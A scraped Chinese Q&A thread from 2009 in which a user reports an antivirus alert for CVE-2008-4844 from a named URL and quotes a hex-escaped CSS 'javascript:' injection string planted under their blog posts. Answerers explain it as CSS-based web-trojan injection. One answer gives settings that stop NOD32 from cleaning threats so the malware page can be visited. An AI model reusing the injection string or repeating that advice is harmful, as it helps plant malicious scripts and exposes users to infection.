UC知道【求助】关于一个木马
来源:百度知道 编辑:UC知道 时间:2024/06/04 12:15:27
最近在浏览校内日志时,nod32老是弹出如下警告,随后页面就被关闭。
2009-6-10 21:45:21 HTTP 过滤器
文件
http://www.123yb.com/count/1/s1.htm
JS/Exploit.CVE-2008-4844.gen 特洛伊木马
连接中断 - 已隔离 WARN\vip
通过应用程序访问 web 时检测到威胁:
C:\Program Files\GreenBrowser\GreenBrowser.exe.
还有,我发现我的每篇日志下面都被留了这么一句话
[link]style=''background:\75\72\6C\28\6A\61\76\61\73\63\72\69\70\74\3A\69\66\28\74\79\70\65\6f\66\28\78\78\29\3d\3d\27\75\6e\64\65\66\69\6E\65\64\27\29\7B\76\61\72\20\73\3d\64\6f\63\75\6d\65\6E\74\2e\63\72\65\61\74\65\45\6c\65\6D\65\6e\74\28\27\73\63\72\69\70\74&
2009-6-10 21:45:21 HTTP 过滤器
文件
http://www.123yb.com/count/1/s1.htm
JS/Exploit.CVE-2008-4844.gen 特洛伊木马
连接中断 - 已隔离 WARN\vip
通过应用程序访问 web 时检测到威胁:
C:\Program Files\GreenBrowser\GreenBrowser.exe.
还有,我发现我的每篇日志下面都被留了这么一句话
[link]style=''background:\75\72\6C\28\6A\61\76\61\73\63\72\69\70\74\3A\69\66\28\74\79\70\65\6f\66\28\78\78\29\3d\3d\27\75\6e\64\65\66\69\6E\65\64\27\29\7B\76\61\72\20\73\3d\64\6f\63\75\6d\65\6E\74\2e\63\72\65\61\74\65\45\6c\65\6D\65\6e\74\28\27\73\63\72\69\70\74&
校内日志时?h t t p://www.1 23yb.com/count/1/s1.htm 这并不是校内的地址 还有这个网页的确加载木马 没有装杀毒的朋友请不要链接 因为这个页面的原因 该页面在下载到ie缓存区后直接被杀毒软件隔离或删除 所以不能再ie里显示
如果真的要访问该页面可以 在杀毒软件中设置为信任 不处理 或还原等操作 不同杀毒软件的操作有些不同 上面的代码是通过css进行网页挂马如果你的校内涂鸦有问题请自己检查
在高级设置中,点Web访问保护,再点引擎参数设置,再点处理威胁,使清除级别设为不清除,点确定,这样你就可访问该页了,访问后再将该设置恢复,以保证安全